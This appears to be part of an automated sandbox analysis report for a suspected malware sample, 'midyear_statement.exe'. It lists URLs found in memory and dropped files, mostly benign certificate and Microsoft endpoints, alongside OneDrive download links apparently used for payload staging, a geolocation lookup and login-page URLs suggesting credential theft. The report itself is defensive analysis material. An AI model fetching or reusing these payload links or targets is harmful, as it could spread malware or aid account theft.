                      Source: midyear_statement.exe, 00000000.00000003.1260712967.000000007EC80000.00000004.00001000.00020000.00000000.sdmp, midyear_statement.exe, 00000000.00000002.1386222924.000000007F070000.00000004.00001000.00020000.00000000.sdmp, midyear_statement.exe, 00000000.00000002.1366143666.0000000002AC3000.00000004.00001000.00020000.00000000.sdmp, midyear_statement.exe, 00000000.00000003.1261008104.000000007EC30000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/DigiCertTrustedG4RSA4096SHA256TimeStampingCA.crl0
                      Source: midyear_statement.exe, 00000000.00000003.1260712967.000000007EC80000.00000004.00001000.00020000.00000000.sdmp, midyear_statement.exe, 00000000.00000002.1386222924.000000007F070000.00000004.00001000.00020000.00000000.sdmp, midyear_statement.exe, 00000000.00000002.1366143666.0000000002AC3000.00000004.00001000.00020000.00000000.sdmp, midyear_statement.exe, 00000000.00000003.1261008104.000000007EC30000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/DigiCertTrustedRootG4.crl0
                      Source: bhv348F.tmp.27.drString found in binary or memory: http://crl3.digicert.com/DigicertSHA2SecureServerCA-1.crl0?
                      Source: bhv348F.tmp.27.drString found in binary or memory: http://crl3.digicert.com/Omniroot2025.crl0
                      Source: bhv348F.tmp.27.drString found in binary or memory: http://crl4.digicert.com/DigiCertGlobalRootCA.crl00
                      Source: bhv348F.tmp.27.drString found in binary or memory: http://crl4.digicert.com/DigiCertGlobalRootG2.crl0
                      Source: bhv348F.tmp.27.drString found in binary or memory: http://crl4.digicert.com/DigiCertGlobalRootG3.crl0
                      Source: bhv348F.tmp.27.drString found in binary or memory: http://crl4.digicert.com/DigiCertTLSRSASHA2562020CA1-4.crl0
                      Source: bhv348F.tmp.27.drString found in binary or memory: http://crl4.digicert.com/DigicertSHA2SecureServerCA-1.crl0
                      Source: bhv348F.tmp.27.drString found in binary or memory: http://crl4.digicert.com/DigicertSHA2SecureServerCA-1.crl0~
                      Source: midyear_statement.exe, 00000000.00000003.1260712967.000000007EC80000.00000004.00001000.00020000.00000000.sdmp, midyear_statement.exe, 00000000.00000002.1386222924.000000007F070000.00000004.00001000.00020000.00000000.sdmp, midyear_statement.exe, 00000000.00000002.1366143666.0000000002AC3000.00000004.00001000.00020000.00000000.sdmp, midyear_statement.exe, 00000000.00000003.1261008104.000000007EC30000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://crt.sectigo.com/SectigoPublicCodeSigningCAEVR36.crt0#
                      Source: midyear_statement.exe, 00000000.00000003.1260712967.000000007EC80000.00000004.00001000.00020000.00000000.sdmp, midyear_statement.exe, 00000000.00000002.1386222924.000000007F070000.00000004.00001000.00020000.00000000.sdmp, midyear_statement.exe, 00000000.00000002.1366143666.0000000002AC3000.00000004.00001000.00020000.00000000.sdmp, midyear_statement.exe, 00000000.00000003.1261008104.000000007EC30000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://crt.sectigo.com/SectigoPublicCodeSigningRootR46.p7c0#
                      Source: wkrriuhD.pif, 00000018.00000003.1379033633.00000000124CA000.00000004.00000020.00020000.00000000.sdmp, wkrriuhD.pif, 00000018.00000003.1379159545.00000000124D2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://geoplugin.net/
                      Source: wkrriuhD.pif, 00000018.00000002.3664577079.00000000124A0000.00000004.00000020.00020000.00000000.sdmp, wkrriuhD.pif, 00000018.00000002.3664577079.00000000124D4000.00000004.00000020.00020000.00000000.sdmp, wkrriuhD.pif, 00000018.00000002.3664577079.00000000124BD000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://geoplugin.net/json.gp
                      Source: wkrriuhD.pif, 00000018.00000002.3664441036.0000000012330000.00000040.00001000.00020000.00000000.sdmp, wkrriuhD.pif, 00000018.00000002.3646905411.0000000000590000.00000040.00000400.00020000.00000000.sdmp, wkrriuhD.pif, 0000001F.00000002.1589395937.0000000024140000.00000040.00001000.00020000.00000000.sdmp, wkrriuhD.pif, 0000001F.00000002.1566851721.0000000000590000.00000040.00000400.00020000.00000000.sdmp, wkrriuhD.pif, 00000021.00000002.1638276893.0000000000590000.00000040.00000400.00020000.00000000.sdmp, wkrriuhD.pif, 00000021.00000002.1638093919.00000000004F0000.00000040.00001000.00020000.00000000.sdmpString found in binary or memory: http://geoplugin.net/json.gp/C
                      Source: wkrriuhD.pif, 00000018.00000003.1379033633.00000000124A0000.00000004.00000020.00020000.00000000.sdmp, wkrriuhD.pif, 00000018.00000003.1382491430.0000000012491000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://geoplugin.net/json.gpSystem32
                      Source: wkrriuhD.pif, 00000018.00000003.1379033633.00000000124BD000.00000004.00000020.00020000.00000000.sdmp, wkrriuhD.pif, 00000018.00000003.1382491430.00000000124BD000.00000004.00000020.00020000.00000000.sdmp, wkrriuhD.pif, 00000018.00000003.1405851694.00000000124BD000.00000004.00000020.00020000.00000000.sdmp, wkrriuhD.pif, 00000018.00000003.1622995189.00000000124BD000.00000004.00000020.00020000.00000000.sdmp, wkrriuhD.pif, 00000018.00000002.3664577079.00000000124BD000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://geoplugin.net/json.gpl
                      Source: midyear_statement.exe, 00000000.00000003.1260712967.000000007EC80000.00000004.00001000.00020000.00000000.sdmp, midyear_statement.exe, 00000000.00000002.1386222924.000000007F070000.00000004.00001000.00020000.00000000.sdmp, midyear_statement.exe, 00000000.00000002.1366143666.0000000002AC3000.00000004.00001000.00020000.00000000.sdmp, midyear_statement.exe, 00000000.00000003.1261008104.000000007EC30000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://ocsp.comodoca.com0
                      Source: bhv348F.tmp.27.drString found in binary or memory: http://ocsp.digicert.com0
                      Source: bhv348F.tmp.27.drString found in binary or memory: http://ocsp.digicert.com0:
                      Source: midyear_statement.exe, 00000000.00000003.1260712967.000000007EC80000.00000004.00001000.00020000.00000000.sdmp, midyear_statement.exe, 00000000.00000002.1386222924.000000007F070000.00000004.00001000.00020000.00000000.sdmp, midyear_statement.exe, 00000000.00000002.1366143666.0000000002AC3000.00000004.00001000.00020000.00000000.sdmp, midyear_statement.exe, 00000000.00000003.1261008104.000000007EC30000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://ocsp.digicert.com0A
Source: midyear_statement.exe, 00000000.00000003.1260712967.000000007EC80000.00000004.00001000.00020000.00000000.sdmp, midyear_statement.exe, 00000000.00000002.1386222924.000000007F070000.00000004.00001000.00020000.00000000.sdmp, midyear_statement.exe, 00000000.00000002.1366143666.0000000002AC3000.00000004.00001000.00020000.00000000.sdmp, midyear_statement.exe, 00000000.00000003.1261008104.000000007EC30000.00000004.00001000.00020000.00000000.sdmp | String found in binary or memory: http://ocsp.digicert.com0C
Source: bhv348F.tmp.27.dr | String found in binary or memory: http://ocsp.digicert.com0H
Source: bhv348F.tmp.27.dr | String found in binary or memory: http://ocsp.digicert.com0I
Source: midyear_statement.exe, 00000000.00000003.1260712967.000000007EC80000.00000004.00001000.00020000.00000000.sdmp, midyear_statement.exe, 00000000.00000002.1386222924.000000007F070000.00000004.00001000.00020000.00000000.sdmp, midyear_statement.exe, 00000000.00000002.1366143666.0000000002AC3000.00000004.00001000.00020000.00000000.sdmp, midyear_statement.exe, 00000000.00000003.1261008104.000000007EC30000.00000004.00001000.00020000.00000000.sdmp | String found in binary or memory: http://ocsp.digicert.com0X
Source: bhv348F.tmp.27.dr | String found in binary or memory: http://ocsp.msocsp.com0
Source: bhv348F.tmp.27.dr | String found in binary or memory: http://ocsp.msocsp.com0S
Source: midyear_statement.exe, 00000000.00000003.1260712967.000000007EC80000.00000004.00001000.00020000.00000000.sdmp, midyear_statement.exe, 00000000.00000002.1386222924.000000007F070000.00000004.00001000.00020000.00000000.sdmp, midyear_statement.exe, 00000000.00000002.1366143666.0000000002AC3000.00000004.00001000.00020000.00000000.sdmp, midyear_statement.exe, 00000000.00000003.1261008104.000000007EC30000.00000004.00001000.00020000.00000000.sdmp | String found in binary or memory: http://ocsp.sectigo.com0
Source: midyear_statement.exe, 00000000.00000003.1260712967.000000007EC80000.00000004.00001000.00020000.00000000.sdmp, midyear_statement.exe, 00000000.00000002.1386222924.000000007F070000.00000004.00001000.00020000.00000000.sdmp, midyear_statement.exe, 00000000.00000002.1366143666.0000000002AC3000.00000004.00001000.00020000.00000000.sdmp, midyear_statement.exe, 00000000.00000003.1261008104.000000007EC30000.00000004.00001000.00020000.00000000.sdmp | String found in binary or memory: http://ocsp.sectigo.com0C
Source: bhv348F.tmp.27.dr | String found in binary or memory: http://www.digicert.com/CPS0
Source: bhv348F.tmp.27.dr | String found in binary or memory: http://www.digicert.com/CPS0~
Source: wkrriuhD.pif, 00000018.00000002.3665873791.0000000015C60000.00000040.10000000.00040000.00000000.sdmp, wkrriuhD.pif, 0000001D.00000002.1388519475.0000000000400000.00000040.80000000.00040000.00000000.sdmp | String found in binary or memory: http://www.ebuddy.com
Source: wkrriuhD.pif, 00000018.00000002.3665873791.0000000015C60000.00000040.10000000.00040000.00000000.sdmp, wkrriuhD.pif, 0000001D.00000003.1386954582.000000000096D000.00000004.00000020.00020000.00000000.sdmp, wkrriuhD.pif, 0000001D.00000002.1388519475.0000000000400000.00000040.80000000.00040000.00000000.sdmp, wkrriuhD.pif, 0000001D.00000003.1386589217.000000000096D000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://www.imvu.com
Source: wkrriuhD.pif, 00000018.00000002.3665873791.0000000015C60000.00000040.10000000.00040000.00000000.sdmp, wkrriuhD.pif, 0000001D.00000002.1388519475.0000000000400000.00000040.80000000.00040000.00000000.sdmp | String found in binary or memory: http://www.imvu.comhttp://www.ebuddy.comhttps://www.google.com
Source: wkrriuhD.pif, 0000001D.00000003.1386954582.000000000096D000.00000004.00000020.00020000.00000000.sdmp, wkrriuhD.pif, 0000001D.00000003.1386589217.000000000096D000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://www.imvu.comppData
Source: wkrriuhD.pif, 00000018.00000002.3665873791.0000000015C60000.00000040.10000000.00040000.00000000.sdmp, wkrriuhD.pif, 0000001D.00000002.1388519475.0000000000400000.00000040.80000000.00040000.00000000.sdmp | String found in binary or memory: http://www.imvu.comr
Source: wkrriuhD.pif, 0000001B.00000002.1406015576.0000000000193000.00000004.00000010.00020000.00000000.sdmp | String found in binary or memory: http://www.nirsoft.net
Source: wkrriuhD.pif, 0000001D.00000002.1388519475.0000000000400000.00000040.80000000.00040000.00000000.sdmp | String found in binary or memory: http://www.nirsoft.net/
Source: midyear_statement.exe, midyear_statement.exe, 00000000.00000003.1190782910.000000007FD60000.00000004.00001000.00020000.00000000.sdmp, midyear_statement.exe, 00000000.00000002.1367976152.00000000040CC000.00000004.00001000.00020000.00000000.sdmp, midyear_statement.exe, 00000000.00000002.1366143666.0000000002A80000.00000004.00001000.00020000.00000000.sdmp, midyear_statement.exe, 00000000.00000002.1381770717.0000000016137000.00000004.00001000.00020000.00000000.sdmp, midyear_statement.exe, 00000000.00000002.1382468437.0000000016170000.00000004.00000020.00020000.00000000.sdmp, midyear_statement.exe, 00000000.00000002.1380482770.0000000015C00000.00000004.00000020.00020000.00000000.sdmp, wkrriuhD.pif, wkrriuhD.pif, 00000018.00000000.1358434050.0000000000416000.00000002.00000001.01000000.00000008.sdmp, wkrriuhD.pif, 0000001B.00000000.1383271733.0000000000416000.00000002.00000001.01000000.00000008.sdmp, wkrriuhD.pif, 0000001C.00000000.1383573996.0000000000416000.00000002.00000001.01000000.00000008.sdmp, wkrriuhD.pif, 0000001D.00000000.1384411850.0000000000416000.00000002.00000001.01000000.00000008.sdmp, wkrriuhD.pif, 0000001F.00000002.1566764474.0000000000416000.00000002.00000001.01000000.00000008.sdmp, wkrriuhD.pif, 00000021.00000000.1636440948.0000000000416000.00000002.00000001.01000000.00000008.sdmp, wkrriuhD.pif.0.dr | String found in binary or memory: http://www.pmail.com
Source: bhv348F.tmp.27.dr | String found in binary or memory: https://M365CDN.nel.measure.office.net/api/report?FrontEnd=VerizonCDNWorldWide&DestinationEndpoint=P
Source: midyear_statement.exe, 00000000.00000003.1240930752.00000000008B1000.00000004.00000020.00020000.00000000.sdmp, Dhuirrkw.PIF, 0000001E.00000003.1545163878.00000000007FA000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://aborlw.sn.files.1drv.com/
Source: Dhuirrkw.PIF, 00000020.00000003.1616842718.00000000007E3000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://aborlw.sn.files.1drv.com/o
Source: Dhuirrkw.PIF, 0000001E.00000003.1545101196.0000000000824000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://aborlw.sn.files.1drv.com/y4mLOg16uNX2Id3t-nfFLVYL7CZhAgTRemSr1q_NX-Mvx_fpOOS9Dz7js9NACEXeYp5
Source: Dhuirrkw.PIF, 00000020.00000003.1616842718.00000000007E3000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://aborlw.sn.files.1drv.com/y4mXBt2sSJKJZHlLzI8sH3PFmgRqsPoY_FaTasOJSi4WNTk8bd6AgZ1TzwzQWZ2uDij
Source: midyear_statement.exe, 00000000.00000003.1240930752.00000000008B1000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://aborlw.sn.files.1drv.com/y4mdIO5pciNH8fpwGOAAIADTo3pXjwRKPU-X6-J-zpDME1cfDB5-C-zJvJ0Zyx9NPNN
Source: Dhuirrkw.PIF, 00000020.00000003.1616842718.00000000007E3000.00000004.00000020.00020000.00000000.sdmp, Dhuirrkw.PIF, 00000020.00000003.1616710283.000000000083A000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://aborlw.sn.files.1drv.com/y4mhPCChdz-WmirIkiDV2ww7X8Bbd2o2c6Warvjl_dk_jMmN6VWuryzdoRm3kPHX80_
Source: midyear_statement.exe, 00000000.00000003.1292113599.00000000008EE000.00000004.00000020.00020000.00000000.sdmp, midyear_statement.exe, 00000000.00000002.1362063312.00000000008EE000.00000004.00000020.00020000.00000000.sdmp, Dhuirrkw.PIF, 0000001E.00000003.1564727013.00000000007FA000.00000004.00000020.00020000.00000000.sdmp, Dhuirrkw.PIF, 00000020.00000003.1637043609.0000000000827000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://abpoxw.sn.files.1drv.com/
Source: Dhuirrkw.PIF, 00000020.00000003.1637043609.00000000007E4000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://abpoxw.sn.files.1drv.com/y4mVdi6rp2qkaaDX5Txipl4hmgaKma0en0K10OdbofbDqqNgddkNvfFr34Mxc3bQcF3
Source: Dhuirrkw.PIF, 00000020.00000003.1637043609.00000000007E4000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://abpoxw.sn.files.1drv.com/y4maSSmIiFxHS53VrMh0Wc-KmE9UNGqFMoeO06mE8M1WEFsDmr1AeIzN4LcJU6cd0Kw
Source: Dhuirrkw.PIF, 0000001E.00000002.1567523437.00000000007E0000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://abpoxw.sn.files.1drv.com/y4mhwTfeKQ4eY5KLg3nmxa_boO0q7i2wmVFOUDCXUh0ad78865G9-BX4CJ3kGlJVsre
Source: midyear_statement.exe, 00000000.00000002.1380482770.0000000015BD6000.00000004.00000020.00020000.00000000.sdmp, midyear_statement.exe, 00000000.00000003.1292113599.00000000008FB000.00000004.00000020.00020000.00000000.sdmp, midyear_statement.exe, 00000000.00000002.1362063312.000000000088A000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://abpoxw.sn.files.1drv.com/y4ms4H1tLcGEiSUU0ZXyS-1UhN1A1nY0HWv2H1VcTggiyFj5GyqXlnGNUvRGU1yWLZH
Source: Dhuirrkw.PIF, 00000020.00000003.1637043609.000000000082F000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://abpoxw.sn.files.1drv.com:443/y4maSSmIiFxHS53VrMh0Wc-KmE9UNGqFMoeO06mE8M1WEFsDmr1AeIzN4LcJU6c
Source: Dhuirrkw.PIF, 0000001E.00000003.1564727013.0000000000818000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://abpoxw.sn.files.1drv.com:443/y4mhwTfeKQ4eY5KLg3nmxa_boO0q7i2wmVFOUDCXUh0ad78865G9-BX4CJ3kGlJ
Source: midyear_statement.exe, 00000000.00000003.1292113599.0000000000907000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://abpoxw.sn.files.1drv.com:443/y4ms4H1tLcGEiSUU0ZXyS-1UhN1A1nY0HWv2H1VcTggiyFj5GyqXlnGNUvRGU1y
Source: Dhuirrkw.PIF, 0000001E.00000003.1514589660.00000000007D0000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://abqscw.sn.files.1drv.com/
Source: midyear_statement.exe, 00000000.00000003.1219564986.00000000008FA000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://abqscw.sn.files.1drv.com/y4m-zYwpFACL5iXnxCgcfUGrba1rEn19VhjL7w-TerMTn_xp_gGpLreK-PlTDk9AFPA
Source: Dhuirrkw.PIF, 0000001E.00000003.1514589660.0000000000803000.00000004.00000020.00020000.00000000.sdmp, Dhuirrkw.PIF, 00000020.00000003.1598043310.0000000000838000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://abqscw.sn.files.1drv.com/y4mM5VAFczkoUgXiRkT2NbXnlBwvzcPuKz5AwJErjUwbkEuoWmzy8jSXGy266gPIcJH
Source: Dhuirrkw.PIF, 0000001E.00000003.1514589660.0000000000803000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://abqscw.sn.files.1drv.com/y4mu3pWdZcj6Ve9WuLc8z50Ki8byXob_qMUj9cAdyMI-JlRVlQqz67Is5cy4lCX-g6M
Source: Dhuirrkw.PIF, 0000001E.00000003.1514589660.0000000000803000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://abqscw.sn.files.1drv.com:443/y4mu3pWdZcj6Ve9WuLc8z50Ki8byXob_qMUj9cAdyMI-JlRVlQqz67Is5cy4lCX
Source: bhv348F.tmp.27.dr | String found in binary or memory: https://aefd.nelreports.net/api/report?cat=bingaot
Source: bhv348F.tmp.27.dr | String found in binary or memory: https://aefd.nelreports.net/api/report?cat=bingaotak
Source: bhv348F.tmp.27.dr | String found in binary or memory: https://aefd.nelreports.net/api/report?cat=bingrms
Source: bhv348F.tmp.27.dr | String found in binary or memory: https://aefd.nelreports.net/api/report?cat=bingth
Source: bhv348F.tmp.27.dr | String found in binary or memory: https://aefd.nelreports.net/api/report?cat=wsb
Source: bhv348F.tmp.27.dr | String found in binary or memory: https://api.msn.com/v1/News/Feed/Windows?apikey=qrUeHGGYvVowZJuHA3XaH0uUvg1ZJ0GUZnXk3mxxPF&ocid=wind
Source: bhv348F.tmp.27.dr | String found in binary or memory: https://assets.msn.com/weathermapdata/1/static/weather/Icons/JyNGQgA=/Condition/AAehwh2.svg
Source: bhv348F.tmp.27.dr | String found in binary or memory: https://config.edge.skype.com/config/v1/ODSP_Sync_Client/19.043.0304.0013?UpdateRing=Prod&OS=Win&OSV
Source: bhv348F.tmp.27.dr | String found in binary or memory: https://cxcs.microsoft.net/api/settings/en-GB/xml/settings-tipset?release=20h1&sku=Professional&plat
Source: bhv348F.tmp.27.dr | String found in binary or memory: https://deff.nelreports.net/api/report?cat=msn
Source: bhv348F.tmp.27.dr | String found in binary or memory: https://ecfdb90f321c52ef6e93077f63413543.azr.footprintdns.com/apc/trans.gif?bd78002c55888096ce060c58
Source: bhv348F.tmp.27.dr | String found in binary or memory: https://ecfdb90f321c52ef6e93077f63413543.azr.footprintdns.com/apc/trans.gif?c2fcd52267835a3e34f9ac05
Source: bhv348F.tmp.27.dr | String found in binary or memory: https://ecs.nel.measure.office.net?TenantId=ODSP_Sync_Client&DestinationEndpoint=Edge-Prod-LAX31r5c&
Source: bhv348F.tmp.27.dr | String found in binary or memory: https://fp-afd.azurefd.us/apc/trans.gif?69c749c200c753dfb00f5bc8299ab8eb
Source: bhv348F.tmp.27.dr | String found in binary or memory: https://fp-afd.azurefd.us/apc/trans.gif?a2555e10569a45fe03b885d268c50da9
Source: bhv348F.tmp.27.dr | String found in binary or memory: https://fp-as.azureedge.net/apc/trans.gif?23ecc2fb73d617d9826364f47d1067db
Source: bhv348F.tmp.27.dr | String found in binary or memory: https://fp-as.azureedge.net/apc/trans.gif?7bac4e73e9b20fcc41dc97447167937d
Source: bhv348F.tmp.27.dr | String found in binary or memory: https://fp.msedge.net/conf/v2/asgw/fpconfig.min.json?monitorId=asgw
Source: midyear_statement.exe, 00000000.00000002.1362063312.000000000088A000.00000004.00000020.00020000.00000000.sdmp, Dhuirrkw.PIF, 00000020.00000003.1637043609.00000000007E4000.00000004.00000020.00020000.00000000.sdmp, Dhuirrkw.PIF, 00000020.00000003.1616842718.00000000007E3000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://live.com/
Source: Dhuirrkw.PIF, 0000001E.00000003.1564727013.00000000007D1000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://live.com/W
Source: Dhuirrkw.PIF, 0000001E.00000003.1514589660.00000000007D0000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://live.com/X
Source: Dhuirrkw.PIF, 0000001E.00000003.1545163878.00000000007D9000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://live.com/a
Source: midyear_statement.exe, 00000000.00000003.1240930752.00000000008B1000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://live.com/g
Source: bhv348F.tmp.27.dr | String found in binary or memory: https://login.live.com/oauth20_authorize.srf?client_id=00000000480728C5&scope=service::ssl.live.com:
Source: bhv348F.tmp.27.dr | String found in binary or memory: https://login.live.com/oauth20_desktop.srf?lc=1033
Source: bhv348F.tmp.27.dr | String found in binary or memory: https://login.live.com/oauth20_logout.srf?client_id=00000000480728C5&redirect_uri=https://login.live
Source: wkrriuhD.pif | String found in binary or memory: https://login.yahoo.com/config/login
Source: bhv348F.tmp.27.dr | String found in binary or memory: https://logincdn.msauth.net/16.000/Converged_v22057_4HqSCTf5FFStBMz0_eIqyA2.css
Source: bhv348F.tmp.27.dr | String found in binary or memory: https://logincdn.msauth.net/16.000/content/js/ConvergedLoginPaginatedStrings.en-gb_RP-iR89BipE4i7ZOq
Source: bhv348F.tmp.27.dr | String found in binary or memory: https://logincdn.msauth.net/shared/1.0/content/js/ConvergedLogin_PCore_tSc0Su-bb7Jt0QVuF6v9Cg2.js
Source: bhv348F.tmp.27.dr | String found in binary or memory: https://logincdn.msauth.net/shared/1.0/content/js/oneDs_f2e0f4a029670f10d892.js
Source: bhv348F.tmp.27.dr | String found in binary or memory: https://oneclient.sfx.ms/PreSignInSettings/Prod/2022-09-17-00-05-23/PreSignInSettingsConfig.json?One
Source: bhv348F.tmp.27.dr | String found in binary or memory: https://oneclient.sfx.ms/PreSignInSettings/Prod/2023-10-05-07-50-22/PreSignInSettingsConfig.json
Source: bhv348F.tmp.27.dr | String found in binary or memory: https://oneclient.sfx.ms/Win/Prod/21.220.1024.0005/update100.xml?OneDriveUpdate=d75433bcf1f9312f1975
Source: bhv348F.tmp.27.dr | String found in binary or memory: https://oneclient.sfx.ms/Win/Prod/741e3e8c607c445262f3add0e58b18f19e0502af.xml?OneDriveUpdate=ad62f4
Source: Dhuirrkw.PIF, 00000020.00000002.1638568341.0000000000808000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://onedrive.live.co
Source: Dhuirrkw.PIF, 00000020.00000002.1638568341.00000000007B1000.00000004.00000020.00020000.00000000.sdmp, Dhuirrkw.PIF, 00000020.00000003.1637043609.000000000078E000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://onedrive.live.com/
Source: Dhuirrkw.PIF, 00000020.00000002.1639873625.0000000003C12000.00000004.00001000.00020000.00000000.sdmp | String found in binary or memory: https://onedrive.live.com/download?resid=653A5056738F1A02%21262&authkey=
Source: Dhuirrkw.PIF, 00000020.00000003.1616842718.00000000007E3000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://onedrive.live.com/download?resid=653A5056738F1A02%21263&authkey=
Source: Dhuirrkw.PIF, 00000020.00000002.1639873625.0000000003C12000.00000004.00001000.00020000.00000000.sdmp | String found in binary or memory: https://onedrive.live.com/download?resid=653A5056738F1A02%21264&authkey=
Source: bhv348F.tmp.27.dr | String found in binary or memory: https://res.cdn.office.net/officehub/bundles/ew-preload-inline-2523c8c1505f1172be19.js
Source: bhv348F.tmp.27.dr | String found in binary or memory: https://res.cdn.office.net/officehub/bundles/otel-logger-104bffe9378b8041455c.js
Source: bhv348F.tmp.27.dr | String found in binary or memory: https://res.cdn.office.net/officehub/bundles/pwa-35de8a913e.css
Source: bhv348F.tmp.27.dr | String found in binary or memory: https://res.cdn.office.net/officehub/bundles/pwa-async-styles.a903b7d0ab82e5bd2f8a.chunk.v7.css
Source: bhv348F.tmp.27.dr | String found in binary or memory: https://res.cdn.office.net/officehub/bundles/pwa-bootstrap-5e7af218e953d095fabf.js
Source: bhv348F.tmp.27.dr | String found in binary or memory: https://res.cdn.office.net/officehub/bundles/pwa-bundle-3a99f64809c6780df035.js
Source: bhv348F.tmp.27.dr | String found in binary or memory: https://res.cdn.office.net/officehub/bundles/pwa-bundle-994d8943fc9264e2f8d3.css
Source: bhv348F.tmp.27.dr | String found in binary or memory: https://res.cdn.office.net/officehub/bundles/pwa-fluent~left-nav-rc.ac5cfbeadfd63fc27ffd.chunk.v7.js
Source: bhv348F.tmp.27.dr | String found in binary or memory: https://res.cdn.office.net/officehub/bundles/pwa-forms-group~mru~officeforms-group-forms~officeforms
Source: bhv348F.tmp.27.dr | String found in binary or memory: https://res.cdn.office.net/officehub/bundles/pwa-left-nav-rc.68ab311bcca4f86f9ef5.chunk.v7.js
Source: bhv348F.tmp.27.dr | String found in binary or memory: https://res.cdn.office.net/officehub/bundles/pwa-mru.2ce72562ad7c0ae7059c.chunk.v7.js
Source: bhv348F.tmp.27.dr | String found in binary or memory: https://res.cdn.office.net/officehub/bundles/pwa-vendor-bundle-ba2888a24179bf152f3d.js
Source: bhv348F.tmp.27.dr | String found in binary or memory: https://res.cdn.office.net/officehub/bundles/pwa-vendors~left-nav-rc.169ce481376dceef3ef6.chunk.v7.c
Source: bhv348F.tmp.27.dr | String found in binary or memory: https://res.cdn.office.net/officehub/bundles/pwa-vendors~left-nav-rc.b24d6b48aeb44c7b5bf6.chunk.v7.j
Source: bhv348F.tmp.27.dr | String found in binary or memory: https://res.cdn.office.net/officehub/bundles/pwaunauth-9d8bc214ac.css
Source: bhv348F.tmp.27.dr | String found in binary or memory: https://res.cdn.office.net/officehub/bundles/sharedfontstyles-27fa2598d8.css
Source: bhv348F.tmp.27.dr | String found in binary or memory: https://res.cdn.office.net/officehub/bundles/sharedscripts-939520eada.js
Source: bhv348F.tmp.27.dr | String found in binary or memory: https://res.cdn.office.net/officehub/bundles/staticpwascripts-30998bff8f.js
Source: bhv348F.tmp.27.dr | String found in binary or memory: https://res.cdn.office.net/officehub/bundles/staticstylesfabric-35c34b95e3.css
Source: bhv348F.tmp.27.dr | String found in binary or memory: https://res.cdn.office.net/officehub/images/content/images/hero-image-desktop-f6720a4145.jpg
Source: bhv348F.tmp.27.dr | String found in binary or memory: https://res.cdn.office.net/officehub/images/content/images/lockup-mslogo-color-78c06e8898.png
Source: bhv348F.tmp.27.dr | String found in binary or memory: https://res.cdn.office.net/officehub/images/content/images/microsoft-365-logo-01d5ecd01a.png
Source: bhv348F.tmp.27.dr | String found in binary or memory: https://res.cdn.office.net/officehub/images/content/images/unauth-apps-image-46596a6856.png
Source: bhv348F.tmp.27.dr | String found in binary or memory: https://res.cdn.office.net/officehub/images/content/images/unauth-checkmark-image-1999f0bf81.png
Source: bhv348F.tmp.27.dr | String found in binary or memory: https://res.cdn.office.net/officehub/versionless/officehome/thirdpartynotice.html
Source: bhv348F.tmp.27.dr | String found in binary or memory: https://res.cdn.office.net/officehub/versionless/webfonts/segoeui_regular.woff2
Source: bhv348F.tmp.27.dr | String found in binary or memory: https://res.cdn.office.net/officehub/versionless/webfonts/segoeui_semibold.woff2
Source: midyear_statement.exe, 00000000.00000003.1260712967.000000007EC80000.00000004.00001000.00020000.00000000.sdmp, midyear_statement.exe, 00000000.00000002.1386222924.000000007F070000.00000004.00001000.00020000.00000000.sdmp, midyear_statement.exe, 00000000.00000002.1366143666.0000000002AC3000.00000004.00001000.00020000.00000000.sdmp, midyear_statement.exe, 00000000.00000003.1261008104.000000007EC30000.00000004.00001000.00020000.00000000.sdmp | String found in binary or memory: https://sectigo.com/CPS0
Source: wkrriuhD.pif, 00000018.00000002.3665873791.0000000015C60000.00000040.10000000.00040000.00000000.sdmp, wkrriuhD.pif, 0000001D.00000002.1388519475.0000000000400000.00000040.80000000.00040000.00000000.sdmp | String found in binary or memory: https://www.google.com
Source: wkrriuhD.pif | String found in binary or memory: https://www.google.com/accounts/servicelogin
Source: bhv348F.tmp.27.dr | String found in binary or memory: https://www.office.com/
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49700
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49722
Source: unknown | Network traffic detected: HTTP traffic on port 49733 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 49699 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49721
Source: unknown | Network traffic detected: HTTP traffic on port 49706 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 49731 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 49702 -> 443
